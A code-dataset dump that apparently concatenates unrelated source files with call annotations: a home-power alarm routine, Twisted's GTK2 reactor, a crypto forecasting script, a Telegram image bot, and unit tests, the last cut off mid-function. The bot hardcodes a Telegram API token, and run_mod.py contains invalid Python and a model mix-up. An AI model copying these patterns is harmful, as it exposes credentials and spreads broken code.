elif new < self._lower_limit: if ( now - self._last_trigger ).total_seconds() > self._min_time_low: # RESET ALARM type_notif = TypeNotif.ALERT_OFF data = type_notif.make_notification_message( self._current_peak, self._last_trigger, self._alarm_start, ) self.log( "RESET ALARM MODE at {}".format(now), level=LOG_LEVEL, log=LOGGER, ) self.notify_alert(type_notif, data) self._alarm_state = False self._critical_alarm_state = False self._last_trigger = None self._alarm_start = None self._turn_off_measure_taken = False self._current_peak = 0 elif ( not self._turn_off_measure_taken and self._critical_alarm_state and new < self._upper_limit ): self.log( "DISABLE CRITICAL ALARM (now {} W)".format(new), level=LOG_LEVEL_ALERT, log=LOGGER, ) self._critical_alarm_state = False elif ( not self._turn_off_measure_taken and self._critical_alarm_state and ( (now - self._alarm_start).total_seconds() > MIN_TIME_TURN_OFF_AC ) ): # Turn off AC if AC + heater are ON self._turn_off_measure_taken = True self._critical_alarm_state = False devices_turning_off = "" if self.get_state(BIG_CONSUMER_1_CLIMATE) == "on": devices_turning_off = BIG_CONSUMER_1_LABEL self.call_service("climate/turn_off", entity_id="all") elif self.get_state(BIG_CONSUMER_2) == "on": devices_turning_off = BIG_CONSUMER_2_LABEL self.call_service( "switch/turn_off", entity_id=BIG_CONSUMER_2 ) if devices_turning_off: # Notification of devices turned off self.log( f"CRITICAL ACTION: Turn off '{devices_turning_off}'", level="ERROR", log=LOGGER, ) type_notif = TypeNotif.ALERT_CRITICAL data = type_notif.make_notification_message( self._current_peak, self._last_trigger, self._alarm_start, devices_off=devices_turning_off, pow_instant=self.get_state(self._main_power_peak), pow_sustained=new, ) self.notify_alert(type_notif, data) self._last_trigger = now else: self._last_trigger = now elif (self._last_trigger is not None) and ( (now - self._last_trigger).total_seconds() > self._min_time_low ): # Normal operation, reset last trigger if no more in min_time_lower self.log( "RESET LAST TRIGGER (was in {})".format(self._last_trigger), level=LOG_LEVEL, log=LOGGER, ) self._last_trigger = None self._current_peak = 0
[((223, 14, 223, 31), 'datetime.datetime.now', 'dt.datetime.now', ({}, {}), '()', True, 'import datetime as dt\n'), ((128, 16, 128, 33), 'datetime.datetime.now', 'dt.datetime.now', ({}, {}), '()', True, 'import datetime as dt\n')]
SPIN-UMass/SWEET
mailmynet/Maildir/proxy_postfix/Twisted-11.0.0/build/lib.linux-x86_64-2.6/twisted/internet/gtk2reactor.py
1b0f39222e7064f70812e3293ca023619295741d
# -*- test-case-name: twisted.internet.test -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ This module provides support for Twisted to interact with the glib/gtk2 mainloop. In order to use this support, simply do the following:: | from twisted.internet import gtk2reactor | gtk2reactor.install() Then use twisted.internet APIs as usual. The other methods here are not intended to be called directly. When installing the reactor, you can choose whether to use the glib event loop or the GTK+ event loop which is based on it but adds GUI integration. """ # System Imports import sys, signal from zope.interface import implements try: if not hasattr(sys, 'frozen'): # Don't want to check this for py2exe import pygtk pygtk.require('2.0') except (ImportError, AttributeError): pass # maybe we're using pygtk before this hack existed. import gobject if hasattr(gobject, "threads_init"): # recent versions of python-gtk expose this. python-gtk=2.4.1 # (wrapping glib-2.4.7) does. python-gtk=2.0.0 (wrapping # glib-2.2.3) does not. gobject.threads_init() # Twisted Imports from twisted.python import log, runtime, failure from twisted.python.compat import set from twisted.internet.interfaces import IReactorFDSet from twisted.internet import main, base, posixbase, error, selectreactor POLL_DISCONNECTED = gobject.IO_HUP | gobject.IO_ERR | gobject.IO_NVAL # glib's iochannel sources won't tell us about any events that we haven't # asked for, even if those events aren't sensible inputs to the poll() # call. INFLAGS = gobject.IO_IN | POLL_DISCONNECTED OUTFLAGS = gobject.IO_OUT | POLL_DISCONNECTED def _our_mainquit(): # XXX: gtk.main_quit() (which is used for crash()) raises an exception if # gtk.main_level() == 0; however, all the tests freeze if we use this # function to stop the reactor. what gives? (I believe this may have been # a stupid mistake where I forgot to import gtk here... I will remove this # comment if the tests pass) import gtk if gtk.main_level(): gtk.main_quit() class Gtk2Reactor(posixbase.PosixReactorBase): """ GTK+-2 event loop reactor. @ivar _sources: A dictionary mapping L{FileDescriptor} instances to gtk watch handles. @ivar _reads: A set of L{FileDescriptor} instances currently monitored for reading. @ivar _writes: A set of L{FileDescriptor} instances currently monitored for writing. @ivar _simtag: A gtk timeout handle for the next L{simulate} call. """ implements(IReactorFDSet) def __init__(self, useGtk=True): self._simtag = None self._reads = set() self._writes = set() self._sources = {} posixbase.PosixReactorBase.__init__(self) # pre 2.3.91 the glib iteration and mainloop functions didn't release # global interpreter lock, thus breaking thread and signal support. if getattr(gobject, "pygtk_version", ()) >= (2, 3, 91) and not useGtk: self.context = gobject.main_context_default() self.__pending = self.context.pending self.__iteration = self.context.iteration self.loop = gobject.MainLoop() self.__crash = self.loop.quit self.__run = self.loop.run else: import gtk self.__pending = gtk.events_pending self.__iteration = gtk.main_iteration self.__crash = _our_mainquit self.__run = gtk.main if runtime.platformType == 'posix': def _handleSignals(self): # Let the base class do its thing, but pygtk is probably # going to stomp on us so go beyond that and set up some # signal handling which pygtk won't mess with. This would # be better done by letting this reactor select a # different implementation of installHandler for # _SIGCHLDWaker to use. 
Then, at least, we could fall # back to our extension module. See #4286. from twisted.internet.process import reapAllProcesses as _reapAllProcesses base._SignalReactorMixin._handleSignals(self) signal.signal(signal.SIGCHLD, lambda *a: self.callFromThread(_reapAllProcesses)) if getattr(signal, "siginterrupt", None) is not None: signal.siginterrupt(signal.SIGCHLD, False) # Like the base, reap processes now in case a process # exited before the handlers above were installed. _reapAllProcesses() # The input_add function in pygtk1 checks for objects with a # 'fileno' method and, if present, uses the result of that method # as the input source. The pygtk2 input_add does not do this. The # function below replicates the pygtk1 functionality. # In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and # g_io_add_watch() takes different condition bitfields than # gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this # bug. def input_add(self, source, condition, callback): if hasattr(source, 'fileno'): # handle python objects def wrapper(source, condition, real_s=source, real_cb=callback): return real_cb(real_s, condition) return gobject.io_add_watch(source.fileno(), condition, wrapper) else: return gobject.io_add_watch(source, condition, callback) def _add(self, source, primary, other, primaryFlag, otherFlag): """ Add the given L{FileDescriptor} for monitoring either for reading or writing. If the file is already monitored for the other operation, we delete the previous registration and re-register it for both reading and writing. """ if source in primary: return flags = primaryFlag if source in other: gobject.source_remove(self._sources[source]) flags |= otherFlag self._sources[source] = self.input_add(source, flags, self.callback) primary.add(source) def addReader(self, reader): """ Add a L{FileDescriptor} for monitoring of data available to read. """ self._add(reader, self._reads, self._writes, INFLAGS, OUTFLAGS) def addWriter(self, writer): """ Add a L{FileDescriptor} for monitoring ability to write data. """ self._add(writer, self._writes, self._reads, OUTFLAGS, INFLAGS) def getReaders(self): """ Retrieve the list of current L{FileDescriptor} monitored for reading. """ return list(self._reads) def getWriters(self): """ Retrieve the list of current L{FileDescriptor} monitored for writing. """ return list(self._writes) def removeAll(self): """ Remove monitoring for all registered L{FileDescriptor}s. """ return self._removeAll(self._reads, self._writes) def _remove(self, source, primary, other, flags): """ Remove monitoring the given L{FileDescriptor} for either reading or writing. If it's still monitored for the other operation, we re-register the L{FileDescriptor} for only that operation. """ if source not in primary: return gobject.source_remove(self._sources[source]) primary.remove(source) if source in other: self._sources[source] = self.input_add( source, flags, self.callback) else: self._sources.pop(source) def removeReader(self, reader): """ Stop monitoring the given L{FileDescriptor} for reading. """ self._remove(reader, self._reads, self._writes, OUTFLAGS) def removeWriter(self, writer): """ Stop monitoring the given L{FileDescriptor} for writing. 
""" self._remove(writer, self._writes, self._reads, INFLAGS) doIterationTimer = None def doIterationTimeout(self, *args): self.doIterationTimer = None return 0 # auto-remove def doIteration(self, delay): # flush some pending events, return if there was something to do # don't use the usual "while self.context.pending(): self.context.iteration()" # idiom because lots of IO (in particular test_tcp's # ProperlyCloseFilesTestCase) can keep us from ever exiting. log.msg(channel='system', event='iteration', reactor=self) if self.__pending(): self.__iteration(0) return # nothing to do, must delay if delay == 0: return # shouldn't delay, so just return self.doIterationTimer = gobject.timeout_add(int(delay * 1000), self.doIterationTimeout) # This will either wake up from IO or from a timeout. self.__iteration(1) # block # note: with the .simulate timer below, delays > 0.1 will always be # woken up by the .simulate timer if self.doIterationTimer: # if woken by IO, need to cancel the timer gobject.source_remove(self.doIterationTimer) self.doIterationTimer = None def crash(self): posixbase.PosixReactorBase.crash(self) self.__crash() def run(self, installSignalHandlers=1): self.startRunning(installSignalHandlers=installSignalHandlers) gobject.timeout_add(0, self.simulate) if self._started: self.__run() def _doReadOrWrite(self, source, condition, faildict={ error.ConnectionDone: failure.Failure(error.ConnectionDone()), error.ConnectionLost: failure.Failure(error.ConnectionLost()), }): why = None inRead = False if condition & POLL_DISCONNECTED and not (condition & gobject.IO_IN): if source in self._reads: why = main.CONNECTION_DONE inRead = True else: why = main.CONNECTION_LOST else: try: if condition & gobject.IO_IN: why = source.doRead() inRead = True if not why and condition & gobject.IO_OUT: # if doRead caused connectionLost, don't call doWrite # if doRead is doWrite, don't call it again. if not source.disconnected: why = source.doWrite() except: why = sys.exc_info()[1] log.msg('Error In %s' % source) log.deferr() if why: self._disconnectSelectable(source, why, inRead) def callback(self, source, condition): log.callWithLogger(source, self._doReadOrWrite, source, condition) self.simulate() # fire Twisted timers return 1 # 1=don't auto-remove the source def simulate(self): """ Run simulation loops and reschedule callbacks. """ if self._simtag is not None: gobject.source_remove(self._simtag) self.runUntilCurrent() timeout = min(self.timeout(), 0.1) if timeout is None: timeout = 0.1 # grumble self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate) class PortableGtkReactor(selectreactor.SelectReactor): """ Reactor that works on Windows. Sockets aren't supported by GTK+'s input_add on Win32. """ _simtag = None def crash(self): selectreactor.SelectReactor.crash(self) import gtk # mainquit is deprecated in newer versions if gtk.main_level(): if hasattr(gtk, 'main_quit'): gtk.main_quit() else: gtk.mainquit() def run(self, installSignalHandlers=1): import gtk self.startRunning(installSignalHandlers=installSignalHandlers) gobject.timeout_add(0, self.simulate) # mainloop is deprecated in newer versions if hasattr(gtk, 'main'): gtk.main() else: gtk.mainloop() def simulate(self): """ Run simulation loops and reschedule callbacks. 
""" if self._simtag is not None: gobject.source_remove(self._simtag) self.iterate() timeout = min(self.timeout(), 0.1) if timeout is None: timeout = 0.1 # grumble self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate) def install(useGtk=True): """ Configure the twisted mainloop to be run inside the gtk mainloop. @param useGtk: should glib rather than GTK+ event loop be used (this will be slightly faster but does not support GUI). """ reactor = Gtk2Reactor(useGtk) from twisted.internet.main import installReactor installReactor(reactor) return reactor def portableInstall(useGtk=True): """ Configure the twisted mainloop to be run inside the gtk mainloop. """ reactor = PortableGtkReactor() from twisted.internet.main import installReactor installReactor(reactor) return reactor if runtime.platform.getType() != 'posix': install = portableInstall __all__ = ['install']
[((40, 4, 40, 26), 'gobject.threads_init', 'gobject.threads_init', ({}, {}), '()', False, 'import gobject\n'), ((65, 7, 65, 23), 'gtk.main_level', 'gtk.main_level', ({}, {}), '()', False, 'import gtk\n'), ((85, 4, 85, 29), 'zope.interface.implements', 'implements', ({(85, 15, 85, 28): 'IReactorFDSet'}, {}), '(IReactorFDSet)', False, 'from zope.interface import implements\n'), ((379, 4, 379, 27), 'twisted.internet.main.installReactor', 'installReactor', ({(379, 19, 379, 26): 'reactor'}, {}), '(reactor)', False, 'from twisted.internet.main import installReactor\n'), ((390, 4, 390, 27), 'twisted.internet.main.installReactor', 'installReactor', ({(390, 19, 390, 26): 'reactor'}, {}), '(reactor)', False, 'from twisted.internet.main import installReactor\n'), ((395, 3, 395, 29), 'twisted.python.runtime.platform.getType', 'runtime.platform.getType', ({}, {}), '()', False, 'from twisted.python import log, runtime, failure\n'), ((32, 8, 32, 28), 'pygtk.require', 'pygtk.require', ({(32, 22, 32, 27): '"""2.0"""'}, {}), "('2.0')", False, 'import pygtk\n'), ((66, 8, 66, 23), 'gtk.main_quit', 'gtk.main_quit', ({}, {}), '()', False, 'import gtk\n'), ((89, 22, 89, 27), 'twisted.python.compat.set', 'set', ({}, {}), '()', False, 'from twisted.python.compat import set\n'), ((90, 23, 90, 28), 'twisted.python.compat.set', 'set', ({}, {}), '()', False, 'from twisted.python.compat import set\n'), ((92, 8, 92, 49), 'twisted.internet.posixbase.PosixReactorBase.__init__', 'posixbase.PosixReactorBase.__init__', ({(92, 44, 92, 48): 'self'}, {}), '(self)', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((207, 8, 207, 52), 'gobject.source_remove', 'gobject.source_remove', ({(207, 30, 207, 51): 'self._sources[source]'}, {}), '(self._sources[source])', False, 'import gobject\n'), ((242, 8, 242, 66), 'twisted.python.log.msg', 'log.msg', (), '', False, 'from twisted.python import log, runtime, failure\n'), ((262, 8, 262, 46), 'twisted.internet.posixbase.PosixReactorBase.crash', 'posixbase.PosixReactorBase.crash', ({(262, 41, 262, 45): 'self'}, {}), '(self)', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((268, 8, 268, 45), 'gobject.timeout_add', 'gobject.timeout_add', ({(268, 28, 268, 29): '(0)', (268, 31, 268, 44): 'self.simulate'}, {}), '(0, self.simulate)', False, 'import gobject\n'), ((305, 8, 305, 74), 'twisted.python.log.callWithLogger', 'log.callWithLogger', ({(305, 27, 305, 33): 'source', (305, 35, 305, 54): 'self._doReadOrWrite', (305, 56, 305, 62): 'source', (305, 64, 305, 73): 'condition'}, {}), '(source, self._doReadOrWrite, source, condition)', False, 'from twisted.python import log, runtime, failure\n'), ((334, 8, 334, 47), 'twisted.internet.selectreactor.SelectReactor.crash', 'selectreactor.SelectReactor.crash', ({(334, 42, 334, 46): 'self'}, {}), '(self)', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((337, 11, 337, 27), 'gtk.main_level', 'gtk.main_level', ({}, {}), '()', False, 'import gtk\n'), ((347, 8, 347, 45), 'gobject.timeout_add', 'gobject.timeout_add', ({(347, 28, 347, 29): '(0)', (347, 31, 347, 44): 'self.simulate'}, {}), '(0, self.simulate)', False, 'import gobject\n'), ((96, 27, 96, 57), 'gobject.main_context_default', 'gobject.main_context_default', ({}, {}), '()', False, 'import gobject\n'), ((99, 24, 99, 42), 'gobject.MainLoop', 'gobject.MainLoop', ({}, {}), '()', False, 'import gobject\n'), ((120, 12, 120, 57), 'twisted.internet.base._SignalReactorMixin._handleSignals', 
'base._SignalReactorMixin._handleSignals', ({(120, 52, 120, 56): 'self'}, {}), '(self)', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((126, 12, 126, 31), 'twisted.internet.process.reapAllProcesses', '_reapAllProcesses', ({}, {}), '()', True, 'from twisted.internet.process import reapAllProcesses as _reapAllProcesses\n'), ((144, 19, 144, 68), 'gobject.io_add_watch', 'gobject.io_add_watch', ({(144, 40, 144, 46): 'source', (144, 48, 144, 57): 'condition', (144, 59, 144, 67): 'callback'}, {}), '(source, condition, callback)', False, 'import gobject\n'), ((158, 12, 158, 56), 'gobject.source_remove', 'gobject.source_remove', ({(158, 34, 158, 55): 'self._sources[source]'}, {}), '(self._sources[source])', False, 'import gobject\n'), ((257, 12, 257, 56), 'gobject.source_remove', 'gobject.source_remove', ({(257, 34, 257, 55): 'self.doIterationTimer'}, {}), '(self.doIterationTimer)', False, 'import gobject\n'), ((315, 12, 315, 47), 'gobject.source_remove', 'gobject.source_remove', ({(315, 34, 315, 46): 'self._simtag'}, {}), '(self._simtag)', False, 'import gobject\n'), ((350, 12, 350, 22), 'gtk.main', 'gtk.main', ({}, {}), '()', False, 'import gtk\n'), ((352, 12, 352, 26), 'gtk.mainloop', 'gtk.mainloop', ({}, {}), '()', False, 'import gtk\n'), ((360, 12, 360, 47), 'gobject.source_remove', 'gobject.source_remove', ({(360, 34, 360, 46): 'self._simtag'}, {}), '(self._simtag)', False, 'import gobject\n'), ((123, 16, 123, 58), 'signal.siginterrupt', 'signal.siginterrupt', ({(123, 36, 123, 50): 'signal.SIGCHLD', (123, 52, 123, 57): '(False)'}, {}), '(signal.SIGCHLD, False)', False, 'import sys, signal\n'), ((274, 46, 274, 68), 'twisted.internet.error.ConnectionDone', 'error.ConnectionDone', ({}, {}), '()', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((275, 46, 275, 68), 'twisted.internet.error.ConnectionLost', 'error.ConnectionLost', ({}, {}), '()', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((339, 16, 339, 31), 'gtk.main_quit', 'gtk.main_quit', ({}, {}), '()', False, 'import gtk\n'), ((341, 16, 341, 30), 'gtk.mainquit', 'gtk.mainquit', ({}, {}), '()', False, 'import gtk\n'), ((297, 16, 297, 47), 'twisted.python.log.msg', 'log.msg', ({(297, 24, 297, 46): "('Error In %s' % source)"}, {}), "('Error In %s' % source)", False, 'from twisted.python import log, runtime, failure\n'), ((298, 16, 298, 28), 'twisted.python.log.deferr', 'log.deferr', ({}, {}), '()', False, 'from twisted.python import log, runtime, failure\n'), ((296, 22, 296, 36), 'sys.exc_info', 'sys.exc_info', ({}, {}), '()', False, 'import sys, signal\n')]
fpl-analytics/gr_crypto
run_mod.py
2b0ab451c9c205a9f572c4bca23fffbb68ca188f
""" Setup: - Import Libraries - Setup tf on multiple cores - Import Data """ import pandas as pd import numpy as np import tensorflow as tf import seaborn as sns from time import time import multiprocessing import random import os from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, LSTM, ConvLSTM2D, Flatten from sklearn.preprocessing import StandardScaler from sklearn.linear_model import LinearRegression from sklearn.ensemble import RandomForestRegressor from joblib import dump, load from mod.prep import log_return, log_return_np, preprocess from mod.model import return_pred from mod.eval import evaluate_regression, evaluate_up_down cores = multiprocessing.cpu_count() tf.config.threading.set_inter_op_parallelism_threads(cores-1) root_folder = "data" wide_close = pd.read_csv(root_folder + "/working/wide_close.csv") wide_target = pd.read_csv(root_folder + "/working/wide_target.csv") asset_details = pd.read_csv(root_folder + "/asset_details.csv") assets = [str(i) for i in asset_details["Asset_ID"]] """ Preprocess """ close_returns = wide_close[assets].apply(log_return) close_returns["time"] = wide_close["time"] close_returns[assets] = close_returns[assets].replace([np.inf,-np.inf],np.nan) """ Linear Regression """ x_steps, y_steps = 60, [1, 15] col_in, col_out = "1", "1" train_x, test_x, train_y, test_y, time_d = preprocess(data_in = wide_close, col_in, col_out, time_col="time", x_steps, y_steps) # 1 step lr_1 = LinearRegression() lr_1.fit(train_x.reshape(-1, x_steps), train_y[:,0,:].reshape(-1, 1)) true, pred = return_pred(test_x, test_y[:,0,:], lr_1) evaluate_regression(true, pred) evaluate_up_down(true, pred) # 15 step lr_15 = LinearRegression() lr_15.fit(train_x.reshape(-1, x_steps), train_y[:,1,:].reshape(-1, 1)) true, pred = return_pred(test_x, test_y[:,1,:], lr_1) evaluate_regression(true, pred) evaluate_up_down(true, pred) """ calculate and store components seperately process: - first, get rolling values for each timestamp - then, predict 1 and 15 gaps and store in array """ # Production """ Steps: - Get train, val test and test indices. Importantly, this needs to cover all assets (even though not all assets exist) for the whole time period. 
- Build models """ assets = list(asset_details["Asset_ID"].astype(str)) # Get indexes i = np.select( [ (wide_close.index >= 0) & (wide_close.index <= (len(wide_close)*0.7)), (wide_close.index > (len(wide_close)*0.7)) & (wide_close.index <= (len(wide_close)*0.8)) ], ["train", "val"], default = "test") indexes = pd.DataFrame({"time":wide_close["time"], "set":i}) for a in assets: print("asset", a) filt = indexes["set"][~pd.isna(wide_close[a])] counts = filt.value_counts() df = pd.DataFrame({"counts":counts, "pct":counts/np.sum(counts)}) print(df, "\n\n") indexes_d = {} for s in indexes["set"].unique(): indexes_d[s] = indexes["time"][indexes["set"] == s] mkdir "model_files" mkdir "model_files/linear_regression" for a in assets: print("Asset", a) x_steps, y_steps = 60, [1, 16] cols_in, cols_out = a, a train_x, test_x, train_y, test_y, time_d = preprocess(wide_close, cols_in, cols_out, "time", x_steps, y_steps) # 1 step lr_1 = LinearRegression() lr_1.fit(train_x.reshape(-1, x_steps), train_y[:,0,:].reshape(-1, 1)) true, pred = return_pred(test_x, test_y[:,0,:], lr_1) print("Model 1 Metrics") evaluate_regression(true, pred) evaluate_up_down(true, pred) # 16 step lr_16 = LinearRegression() lr_16.fit(train_x.reshape(-1, x_steps), train_y[:,1,:].reshape(-1, 1)) true, pred = return_pred(test_x, test_y[:,1,:], lr_16) print("Model 16 Metrics") evaluate_regression(true, pred) evaluate_up_down(true, pred) dump(lr_1, f"model_files/linear_regression/lr_{a}_1") dump(lr_16, f"model_files/linear_regression/lr_{a}_16") dump(time_d, "model_files/linear_regression/lr_times") """ Random Forest """ rf = RandomForestRegressor(n_jobs=-1) # start = time.time() rf.fit(train_x.reshape(-1, x_steps), train_y.reshape(-1)) # print("Took:", round(start-time.time()))
[]
menlen/one
bot.py
e24f1489d98faa9b548ebd668f2860c8d671b489
# This example show how to use inline keyboards and process button presses import telebot import time from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton import os, sys from PIL import Image, ImageDraw, ImageFont import random TELEGRAM_TOKEN = '1425859530:AAF5MQE87Zg_bv3B2RLe3Vl2A5rMz6vYpsA' bot = telebot.TeleBot(TELEGRAM_TOKEN) channelId = -1001390673326 user_dict = {} def TextToImg(ext): IMAGES = [ 'AROQ.jpg', 'AK47.jpg', 'BAXT.jpg', 'BASKETBOL.jpg', 'BAXTLI.jpg', 'DOST.jpg', 'ER.jpg', 'ETIK.jpg', 'FUTBOL.jpg', 'GAZ.jpg', 'HOTIN.jpg', 'BAXT.jpg', 'IPHONE.jpg', 'KOLBASA.jpg', 'KONFET.jpg', 'KOZGU.jpg', 'KUCHUK.jpg', 'MOSHINA.jpg', 'NEWISHTON.jpg', 'NOTEBOOK.jpg', 'OMAD.jpg', 'OYINCHOQ.jpg', 'PAYPQO.jpg', 'BAXT.jpg', 'PUL.jpg', 'PULTUG.jpg', 'QORQIZ.jpg', 'SOSISKA.jpg', 'TELEFON.jpg', 'TELEFONZ.jpg', 'TOK.jpg', 'TORSHIM.jpg', 'TUYA.jpg', 'UY.jpg', 'ZAMBARAK.jpg' ] try: img = random.choice(IMAGES) except: time.sleep(2) img = random.choice(IMAGES) # get an image base = Image.open(img).convert("RGBA") ext = ext.upper() text = ext # make a blank image for the text, initialized to transparent text color txt = Image.new("RGBA", base.size, (255,255,255,0)) # get a font fnt = ImageFont.truetype("OpenSans-Italic.ttf", 40) # get a drawing context d = ImageDraw.Draw(txt) # draw text, half opacity d.text(((800)/2,(1136)/2), text, font=fnt, fill=(255,0,0,255), anchor='mb') out = Image.alpha_composite(base, txt) filename = random.randint(1,35) g = out.save(f'{filename}.png') return filename def gen_markup(): markup = InlineKeyboardMarkup() markup.row_width = 1 markup.add(InlineKeyboardButton("Azo bo'ling", callback_data="cb_yes", url='t.me/onideal'), InlineKeyboardButton("Tasdiqlash", callback_data="cb_no")) return markup def getUserFromChannel(userId): u = bot.get_chat_member(channelId, userId) return u.status @bot.callback_query_handler(func=lambda call: True) def callback_query(call): if call.data == "cb_yes": bot.answer_callback_query(call.id, "Answer is Yes") elif call.data == "cb_no": u = getUserFromChannel(call.from_user.id) if u == 'member': msg = bot.send_message(call.from_user.id, """\ Juda soz!!!, Ismingizni yozing """) bot.register_next_step_handler(msg, process_name_step) else: bot.send_message(call.from_user.id, f"Salom {call.from_user.first_name}, kanallarga a'zo bo'ling va A'zolikni tekshirish buyrug'ini tanlang", reply_markup=gen_markup()) def process_name_step(message): try: name = message.text myfile = TextToImg(name) photoSend = open(f'{myfile}.png', 'rb') caption = f'{name} : ismiga sovga @onideal \n@giftmerobot \n@mygiftrobot' bot.send_photo(message.chat.id, photoSend, caption=caption) except Exception as e: bot.reply_to(message, 'oooops') @bot.message_handler(func=lambda message: True) def message_handler(message): us = getUserFromChannel(message.chat.id) if us == 'member': msg = bot.send_message(message.chat.id, """\ Juda soz!!!, Ismingizni yozing """) bot.register_next_step_handler(msg, process_name_step) else: bot.send_message(message.chat.id, f"Salom {message.from_user.first_name}, kanallarga a'zo bo'ling va A'zolikni tekshirish buyrug'ini tanlang", reply_markup=gen_markup()) bot.polling(none_stop=True)
[((11, 6, 11, 37), 'telebot.TeleBot', 'telebot.TeleBot', ({(11, 22, 11, 36): 'TELEGRAM_TOKEN'}, {}), '(TELEGRAM_TOKEN)', False, 'import telebot\n'), ((66, 10, 66, 55), 'PIL.Image.new', 'Image.new', ({(66, 20, 66, 26): '"""RGBA"""', (66, 28, 66, 37): 'base.size', (66, 39, 66, 54): '(255, 255, 255, 0)'}, {}), "('RGBA', base.size, (255, 255, 255, 0))", False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((68, 10, 68, 55), 'PIL.ImageFont.truetype', 'ImageFont.truetype', ({(68, 29, 68, 50): '"""OpenSans-Italic.ttf"""', (68, 52, 68, 54): '40'}, {}), "('OpenSans-Italic.ttf', 40)", False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((70, 8, 70, 27), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', ({(70, 23, 70, 26): 'txt'}, {}), '(txt)', False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((75, 10, 75, 42), 'PIL.Image.alpha_composite', 'Image.alpha_composite', ({(75, 32, 75, 36): 'base', (75, 38, 75, 41): 'txt'}, {}), '(base, txt)', False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((77, 15, 77, 35), 'random.randint', 'random.randint', ({(77, 30, 77, 31): '1', (77, 32, 77, 34): '35'}, {}), '(1, 35)', False, 'import random\n'), ((82, 13, 82, 35), 'telebot.types.InlineKeyboardMarkup', 'InlineKeyboardMarkup', ({}, {}), '()', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton\n'), ((57, 14, 57, 35), 'random.choice', 'random.choice', ({(57, 28, 57, 34): 'IMAGES'}, {}), '(IMAGES)', False, 'import random\n'), ((84, 15, 84, 94), 'telebot.types.InlineKeyboardButton', 'InlineKeyboardButton', (), '', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton\n'), ((85, 31, 85, 88), 'telebot.types.InlineKeyboardButton', 'InlineKeyboardButton', (), '', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton\n'), ((59, 8, 59, 21), 'time.sleep', 'time.sleep', ({(59, 19, 59, 20): '(2)'}, {}), '(2)', False, 'import time\n'), ((60, 14, 60, 35), 'random.choice', 'random.choice', ({(60, 28, 60, 34): 'IMAGES'}, {}), '(IMAGES)', False, 'import random\n'), ((62, 11, 62, 26), 'PIL.Image.open', 'Image.open', ({(62, 22, 62, 25): 'img'}, {}), '(img)', False, 'from PIL import Image, ImageDraw, ImageFont\n')]
Southampton-RSG/2019-03-13-southampton-swc
novice/python-unit-testing/answers/test_rectangle2.py
1f07d82c1bd1f237a19fa7a17bb4765e0364dc88
from rectangle2 import rectangle_area

def test_unit_square():
    assert rectangle_area([0, 0, 1, 1]) == 1.0

def test_large_square():
    assert rectangle_area([1, 1, 4, 4]) == 9.0

def test_actual_rectangle():
    assert rectangle_area([0, 1, 4, 7]) == 24.0
[((4, 11, 4, 39), 'rectangle2.rectangle_area', 'rectangle_area', ({(4, 26, 4, 38): '[0, 0, 1, 1]'}, {}), '([0, 0, 1, 1])', False, 'from rectangle2 import rectangle_area\n'), ((7, 11, 7, 39), 'rectangle2.rectangle_area', 'rectangle_area', ({(7, 26, 7, 38): '[1, 1, 4, 4]'}, {}), '([1, 1, 4, 4])', False, 'from rectangle2 import rectangle_area\n'), ((10, 11, 10, 39), 'rectangle2.rectangle_area', 'rectangle_area', ({(10, 26, 10, 38): '[0, 1, 4, 7]'}, {}), '([0, 1, 4, 7])', False, 'from rectangle2 import rectangle_area\n')]
unclechu/py-radio-class
tests/requestreply.py
8f96d8bcb398693d18a4ebd732415a879047edee
# -*- coding: utf-8 -*- from unittest import TestCase, TestLoader from radio import (Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound) def init_radio(f): def wrap(self, *args): self.radio = Radio() return f(self, *args) return wrap class TestRadioRequestReplyMethods(TestCase): @init_radio def test_request_reply_stop_replying(self): ''' "request", "reply" and "stopReplying" methods work correctly. ''' def foo_handler(): return 'foo' def bar_handler(my_arg=222): return my_arg self.radio.reply('foo', foo_handler) self.radio.reply('bar', bar_handler) self.assertEqual(self.radio.request('foo'), 'foo') self.assertEqual(self.radio.request('bar'), 222) self.assertEqual(self.radio.request('bar', 333), 333) self.assertEqual(self.radio.request('bar', my_arg=444), 444) self.radio.stopReplying('foo') self.radio.stopReplying('bar') with self.assertRaises(ListenerNotFound): self.radio.request('foo') with self.assertRaises(ListenerNotFound): self.radio.request('bar') @init_radio def test_kwargs(self): ''' Keyword arguments works correctly. ''' foo_list = [] def foo_handler(foo, bar): return (foo, bar) self.radio.reply('foo', foo_handler) self.assertEqual(self.radio.request('foo', bar=5, foo=10), (10, 5)) @init_radio def test_on_already_bound(self): ''' "reply" fails when trying to bound handler that is already bounded. ''' def foo_handler(): pass self.radio.reply('foo', foo_handler) self.radio.reply('bar', foo_handler) # General exception with self.assertRaises(HandlerAlreadyBound): self.radio.reply('foo', foo_handler) # Child exception with self.assertRaises(ReplyHandlerAlreadyBound): self.radio.reply('foo', foo_handler) @init_radio def test_off_handler_that_was_not_bounded(self): ''' "stopReplying" fails when trying to unbound handler that was not bounded. ''' def foo_handler(): pass with self.assertRaises(ListenerNotFound): self.radio.stopReplying('foo', foo_handler) @init_radio def test_off_soft_mode(self): ''' "stopReplying" will not fail if safe-argument is set to True. ''' def foo_handler(): pass self.radio.stopReplying('foo', foo_handler, soft=True) self.radio.stopReplying('foo', foo_handler, soft=True) @init_radio def test_trigger_fail_on_incorrect_arguments(self): ''' "request" fails when arguments for handler is incorrect. ''' def 